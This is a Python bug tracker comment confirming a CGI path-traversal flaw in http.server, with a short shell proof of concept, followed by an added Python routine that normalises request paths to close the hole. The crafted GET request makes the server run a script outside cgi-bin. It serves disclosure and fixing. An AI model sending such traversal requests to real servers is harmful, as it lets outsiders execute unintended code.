Christian Heimes added the comment:

I can confirm the issue:

$ mkdir www
$ cd www
$ cat << EOF > badscript.sh
#!/bin/sh
echo hacked
EOF
$ chmod +x badscript.sh
$ ../python -m http.server --cgi
$ echo "GET ///////////badscript.sh/../cgi-bin/cgi.sh HTTP/1.1" | nc localhost 8000
HTTP/1.0 200 Script output follows
Server: SimpleHTTP/0.6 Python/3.4.0a4+
Date: Tue, 29 Oct 2013 16:47:22 GMT

hacked

----------
assignee: -> christian.heimes
nosy: +benjamin.peterson, georg.brandl, larry
priority: normal -> release blocker
stage: -> test needed
versions: +Python 2.7, Python 3.3, Python 3.4

_______________________________________
Python tracker <rep...@bugs.python.org>
<http://bugs.python.org/issue19435>
_______________________________________
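
The tracker entry above is marked "test needed". As an added example (not code from this message or from CPython), the check below collapses a request path once and derives both the "is this CGI?" decision and the script path from that single value, so a request like the one shown cannot name one file for the check and another for execution. The function names are hypothetical; `/cgi-bin` and `/htbin` are the default `cgi_directories` of `http.server`.

```python
from urllib.parse import unquote

# Default CGI directories of http.server's CGIHTTPRequestHandler.
CGI_DIRECTORIES = ("/cgi-bin", "/htbin")


def collapse_url_path(raw_path):
    """Drop the query string, percent-decode, then resolve '.', '..' and
    repeated slashes. '..' at the root is discarded, never climbed past."""
    path = unquote(raw_path.split("?", 1)[0])
    parts = []
    for segment in path.split("/"):
        if segment in ("", "."):
            continue
        if segment == "..":
            if parts:
                parts.pop()
            continue
        parts.append(segment)
    return "/" + "/".join(parts)


def resolve_cgi(raw_path, cgi_directories=CGI_DIRECTORIES):
    """Return (cgi_dir, script_path) when the collapsed path names something
    inside a CGI directory, else None. Both values come from the same
    collapsed string, so the check and the executed path cannot diverge."""
    collapsed = collapse_url_path(raw_path)
    for cgi_dir in cgi_directories:
        prefix = cgi_dir + "/"
        if collapsed.startswith(prefix) and len(collapsed) > len(prefix):
            return cgi_dir, collapsed[len(prefix):]
    return None


if __name__ == "__main__":
    # Constructed sample requests; the first is the path from the report.
    samples = [
        "///////////badscript.sh/../cgi-bin/cgi.sh",
        "/badscript.sh",
        "/cgi-bin/../badscript.sh",
        "/cgi-bin/%2e%2e/badscript.sh",
        "/cgi-bin/cgi.sh?arg=../../x",
    ]
    for request_path in samples:
        print(f"{request_path!r:50} -> {resolve_cgi(request_path)}")
```

With this logic the reported request resolves to `cgi.sh` inside `/cgi-bin`, and `badscript.sh` in the document root is never selected for execution.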